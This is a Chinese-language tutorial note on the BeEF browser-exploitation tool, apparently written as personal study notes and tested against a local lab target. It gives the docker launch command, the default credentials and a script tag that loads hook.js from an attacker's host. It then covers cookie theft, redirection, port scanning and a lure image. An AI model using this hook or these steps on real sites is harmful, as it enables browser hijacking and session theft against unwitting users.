本文对Beef这款工具的具体功能操作,做一些介绍
Beef是什么呢? 它是一款用于渗透测试用的工具,它可以劫持受害者的浏览器,执行一些用户未执行的命令,也可以远程获取受害者的cookie等……
在kali系统里这款工具是自带的,直接在搜索框里搜索就可以;但有些版本是没有的
如果你的kali系统里没有自带的话可以用下面这行代码使用Beef,直接一条命令就搞定了,无需多余操作。
docker run --rm -p 3000:3000 janes/beef
当然,如果没有docker的话自行安装。某度上都有,很简单
输入命令后等待下载(这条命令第一次使用是下载beef,日后工具的启动,也可以用这条命令)
输入这条命令启动这款工具,下面是什么都没有显示的,就像这张图一样可以用ctrl+c先结束掉程序,结束掉以后会出现一些东西,就像下面这张图
浏览器访问那个127.0.0.1:3000/ui/panel的地方,即可登录beef
http://172.17.0.2:3000/ui/panel
默认账号密码都是 beef beef
这个保存密码是浏览器的功能不是beef程序的要求随便选不重要,第一次登录的时候,看别人的文章以为是要我改密码来着。我们使用docker这个命令运行的beef不用去改什么密码,直接照样用,没有事儿
登录上去的样子 。如下图:
我随便找了个本地的靶场,在这个靶场里面链接了那个hook.js文件;打开开发者工具查看数据包,看见成功引用了hook.js文件,说明已经中招。
<script src="http://your IP:your port/hook.js"></script>
我们这时候就可以去beef的控制盘里看看情况了,在这一栏里出现了我物理机的IP地址,表示这就是你可以操作的目标了。如下图:
来到Commands选项卡里面的,我们可以做一些具体操作,比如这个Redirect Browser里的重定向功能 如下图:
可以用Get Cookie的功能,获取受害者当前站点的Cookie。如下图:
你点击一次命令执行,这边就会出现一个结果,点击两次,就会出现两个,第二个里面就是你第二次命令执行的结果。如下图
在这个功能里面,可以对目标进行端口扫描,扫描需要一些时间,等待一会即可。如下图:
在这个功能里面我们可以指定用户的浏览器界面上出现一个我们自定义的图片出来,这个图片可以点击,如果用户点击了则会跳转到我们指定的网站上去。如下图:
受害者原本的模样。如下图:
命令执行后受害者的浏览器,这个图片可点击,点击后会跳转网站。如下图:
由于那个默认跳转的地址是一个下载的文件,所以是这个样子。如下图
工具的利用就说到这了,感谢观看,记一次学习笔记